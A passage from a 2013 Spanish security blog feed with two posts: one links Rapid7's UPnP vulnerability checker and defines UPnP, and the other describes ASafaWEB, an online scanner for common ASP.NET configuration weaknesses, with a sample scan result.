&lt;div&gt;
&lt;b&gt;Rapid7 &lt;/b&gt;ha creado una aplicación que permite descubrir si nuestra red es vulnerable o no, se llama ScanNow UPnP y se puede descargar en el siguiente enlace:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://updates.metasploit.com/data/ScanNowUPnP.exe"&gt;http://updates.metasploit.com/data/ScanNowUPnP.exe&lt;/a&gt;&amp;nbsp;| Microsoft Defender o Google Chrome que ha detectado el programa como Malware, sin embargo un&amp;nbsp;análisis&amp;nbsp;en VirusTotal confirma que no es un Malware (al menos conocido) :) &lt;a href="https://www.virustotal.com/file/313c0edf0b11dde4caa6fb969c201b42abffe32dc6c8f3371a7346664300ad7f/analysis/" target="_blank"&gt;Enlace del&amp;nbsp;análisis&lt;/a&gt;&amp;nbsp;de VirusTotal.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Para terminar, os dejo una definición de lo que se entiende por UPnP:&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué es UPnP?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Universal Plug and Play (UPnP) es un conjunto de &lt;a href="http://es.wikipedia.org/wiki/Protocolo_de_comunicaciones"&gt;protocolos de comunicación&lt;/a&gt; que permite a &lt;a href="http://es.wikipedia.org/wiki/Perif%C3%A9rico_(inform%C3%A1tica)"&gt;periféricos&lt;/a&gt; en red, como ordenadores personales, impresoras, pasarelas de Internet, puntos de acceso &lt;a href="http://es.wikipedia.org/wiki/Wi-Fi"&gt;Wi-Fi&lt;/a&gt; y dispositivos móviles, descubrir de manera transparente la presencia de otros dispositivos en la red y establecer &lt;a href="http://es.wikipedia.org/wiki/Servicio_de_red"&gt;servicios de red&lt;/a&gt; de comunicación, compartición de datos y entretenimiento. UPnP está diseñado principalmente para redes de hogar sin dispositivos del ámbito empresarial&lt;span style="background-color: white; font-family: sans-serif; line-height: 19.1875px;"&gt;.&lt;span style="font-size: x-small;"&gt;&lt;a href="http://es.wikipedia.org/wiki/Universal_Plug_and_Play" target="_blank"&gt;[From Wikipedia]&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: sans-serif; line-height: 19.1875px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Más información: &lt;a href="https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play" target="_blank"&gt;Security Flaws in UPnP&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=ypxCXtD4W5U:NWMPfurcP3s:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=ypxCXtD4W5U:NWMPfurcP3s:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=ypxCXtD4W5U:NWMPfurcP3s:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=ypxCXtD4W5U:NWMPfurcP3s:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/ypxCXtD4W5U" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/ypxCXtD4W5U/vulnerabilidad-grave-detectada-en-el.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-2BV4cKNxK1A/UQgMT_ZDAlI/AAAAAAAADyc/DLzHARo9lXg/s72-c/Rapid_vul_UPnP.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/01/vulnerabilidad-grave-detectada-en-el.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-202711481528002270</guid><pubDate>Tue, 29 Jan 2013 12:28:00 +0000</pubDate><atom:updated>2013-01-29T13:28:41.714+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Web</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Analisis</category><category domain="http://www.blogger.com/atom/ns#">ASP.NET</category><category domain="http://www.blogger.com/atom/ns#">ASafaWEB</category><category domain="http://www.blogger.com/atom/ns#">Scanner</category><title>[Tools] ASafaWEB - Automated Security Analyser for ASP.NET Websites </title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-iI36BWTPZXE/UQfAU2jaZDI/AAAAAAAADwI/_r9VamqjoLY/s1600/ASafaWEB_Logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="254" src="http://3.bp.blogspot.com/-iI36BWTPZXE/UQfAU2jaZDI/AAAAAAAADwI/_r9VamqjoLY/s320/ASafaWEB_Logo.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué es ASafaWEB?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Es un &lt;a href="https://asafaweb.com/" target="_blank"&gt;servicio Online&lt;/a&gt; (de momento gratuito) que te permite realizar un "scan" de tu web con tecnologías ASP.NET.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este "scan" realiza una serie de consultas HTTP sencillas con objeto de examinar la configuración y las vulnerabilidades más comunes.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué tipos de scanner se implementan?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esta WEB realiza una serie de pruebas y comprobaciones de las aplicaciones web con ASP.Net, verificando:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Tracing&lt;/b&gt;: comprobación si es accesible /trace.axd&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Custom errors&lt;/b&gt;: verificación de los errores y configuración existen en la respuesta a peticiones HTTP erroneás.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Stack trace&lt;/b&gt;: se encuentra habilitado esta&amp;nbsp;característica&amp;nbsp;en las páginas que muestran errores.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;HTTPS: &amp;nbsp;comprobación de la configuración HTTPS, y si existe la posibilidad de realizar&amp;nbsp;re direcciones&amp;nbsp;de HTTP a HTTPS, con la posibilidad de realizar ataques Man in the Middle.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Hash DoS patch&lt;/b&gt;: comprobación de la vulnerabilidad, verificando si ha sido o no actualizado correctamente el framework.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Public ELMAH logs&lt;/b&gt;: realiza un escaneo del archivo /elmah.axd, comprobando su existen y configuración.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Excessive headers&lt;/b&gt;:&amp;nbsp;análisis&amp;nbsp;de la cantidad de información que es accesible y puesta a disposición del publico a través del servidor IIS.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué pasa con la privacidad de los resultados?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Según afirma en la propia página WEB, la empresa no almacena información ninguna , salvo aquella que es necesaria durante la realización del scanner, que se entiende que son necesarios para el&amp;nbsp;análisis&amp;nbsp;de la información recibida.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Ejemplo de uso: www.casareal.es&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-buKWk3iY_Hg/UQe_eh_TVDI/AAAAAAAADv8/rL1HWcmCOsw/s1600/CSMR_result.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://4.bp.blogspot.com/-buKWk3iY_Hg/UQe_eh_TVDI/AAAAAAAADv8/rL1HWcmCOsw/s640/CSMR_result.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cccccc; font-size: x-small;"&gt;&lt;b&gt;Nota:&lt;/b&gt;&lt;span style="background-color: black;"&gt; El ejemplo es puramente&amp;nbsp;académico, y como tal ha de tomarse. No me hago responsable del mal uso que pueda hacerse de esta información dispone&amp;nbsp;públicamente.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Vía:&lt;/b&gt; &lt;a href="https://twitter.com/4v4t4r" target="_blank"&gt;@4v4t4r&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Más información&lt;/b&gt;:&amp;nbsp;&lt;a href="https://asafaweb.com/"&gt;https://asafaweb.com/&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=_ZeEIESCqkw:nBG4tdC_O4g:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=_ZeEIESCqkw:nBG4tdC_O4g:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=_ZeEIESCqkw:nBG4tdC_O4g:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=_ZeEIESCqkw:nBG4tdC_O4g:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/_ZeEIESCqkw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/_ZeEIESCqkw/tools-asafaweb-automated-security.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-iI36BWTPZXE/UQfAU2jaZDI/AAAAAAAADwI/_r9VamqjoLY/s72-c/ASafaWEB_Logo.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/01/tools-asafaweb-automated-security.html</feedburner:origLink></item></channel></rss>
